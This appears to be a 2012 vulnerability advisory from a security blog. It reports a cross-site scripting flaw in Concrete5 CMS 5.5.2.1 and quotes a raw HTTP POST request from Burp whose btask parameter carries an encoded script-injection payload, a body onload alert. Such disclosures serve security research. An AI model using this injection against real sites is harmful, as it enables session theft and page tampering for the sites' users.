[ TITLE ....... ][ Concrete 5.5.2.1 Cross Site Scripting [ DATE ........ ][ 23.04.2012 [ AUTOHR ...... ][ http://hauntit.blogspot.com [ SOFT LINK ... ][ http://www.concrete5.org/ [ VERSION ..... ][ 5.5.2.1 [ TESTED ON ... ][ LAMP [ ----------------------------------------------------------------------- [ [ 1. What is this? [ 2. What is the type of vulnerability? [ 3. Where is bug :) [ 4. More... [--------------------------------------------[ [ 1. What is this? This is very nice CMS, You should try it! ;) [--------------------------------------------[ [ 2. What is the type of vulnerability? This is cross site scripting vulnerability. [--------------------------------------------[ [ 3. Where is bug :) ...raw cut from Burp... POST /concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form HTTP/1.1 (...) ...end cut... And 'cut' from answer with our 'payload': " (...) (...) " [--------------------------------------------[ [ 4. More... - http://hauntit.blogspot.com - http://www.concrete5.org/ - http://www.google.com - http://portswigger.net [ [--------------------------------------------[ [ Ask me about new projects @ mail. ;) ] [ Best regards [